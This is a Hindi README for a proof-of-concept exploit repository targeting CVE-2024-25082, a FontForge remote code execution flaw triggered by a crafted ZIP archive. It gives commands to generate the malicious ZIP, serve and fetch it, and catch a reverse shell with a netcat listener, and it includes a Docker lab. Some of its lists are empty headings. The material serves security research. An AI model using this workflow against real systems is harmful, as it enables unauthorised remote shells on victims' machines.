
CVE-2024-25082 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो फ़ॉन्टफोर्ज में तैयार किए गए ZIP आर्काइव के माध्यम से रिमोट कोड निष्पादन का प्रदर्शन करता है। इसमें पेलोड जनरेटर, डॉकर लैब और सुरक्षा अनुसंधान एवं शिक्षा के लिए तकनीकी लेख शामिल है।
CVE-2024-25082 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो FontForge को प्रभावित करने वाली एक भेद्यता है और एक निर्मित ZIP संग्रह के माध्यम से रिमोट कोड निष्पादन (RCE) की अनुमति देती है।
यह भंडार दर्शाता है कि नियंत्रित प्रयोगशाला वातावरण में सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए भेद्यता का शोषण कैसे किया जा सकता है।
भेद्यता ZIP संग्रह के अंदर फ़ाइलों के अनुचित सत्यापन के कारण होती है, जिससे हमलावर लक्ष्य प्रणाली पर मनमाने कमांड निष्पादित कर सकता है।
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│ └── exploit.zip
├── writeup.md
└── License
फ़ाइल विवरण
exploit.py दुर्भावनापूर्ण ZIP पेलोड उत्पन्न करता है poc/ उत्पन्न प्रूफ-ऑफ-कॉन्सेप्ट फ़ाइलें शामिल हैं writeup.md भेद्यता का तकनीकी विवरण
वैकल्पिक उपकरण स्थापित करें:
sudo apt install netcat
python3 exploit.py --lhost <Your IP> --lport <Your Port>
यह एक दुर्भावनापूर्ण exploit.zip फ़ाइल उत्पन्न करेगा।
python3 -m http.server 8080
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip
nc -lvnp <Your Port>
सफल होने पर, लक्ष्य प्रणाली से एक शेल प्राप्त होना चाहिए।
एक प्रतिलिपि योग्य भेद्य वातावरण docker/ निर्देशिका के अंदर प्रदान किया गया है।
उदाहरण:
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln
यह उत्पादन प्रणालियों को प्रभावित किए बिना सुरक्षित परीक्षण की अनुमति देता है।
एक हमलावर जो भेद्य एप्लिकेशन द्वारा संसाधित ZIP फ़ाइलों को अपलोड या नियंत्रित कर सकता है, वह निम्न कर सकता है:
अनुशंसित शमन कदम:
इस भंडार में सार्वजनिक रूप से खुलासा की गई भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट कोड है।
कोड केवल निम्न के लिए सख्ती से प्रदान किया गया है:
स्पष्ट अनुमति के बिना इस कोड का प्रणालियों के विरुद्ध उपयोग न करें।
लेखक इस सॉफ्टवेयर द्वारा होने वाले दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।
Moamen Elmaghrabi
साइबर सुरक्षा छात्र
प्रवेश परीक्षण और शोषण विकास
यह परियोजना MIT लाइसेंस के तहत लाइसेंस प्राप्त है।
विवरण के लिए LICENSE फ़ाइल देखें।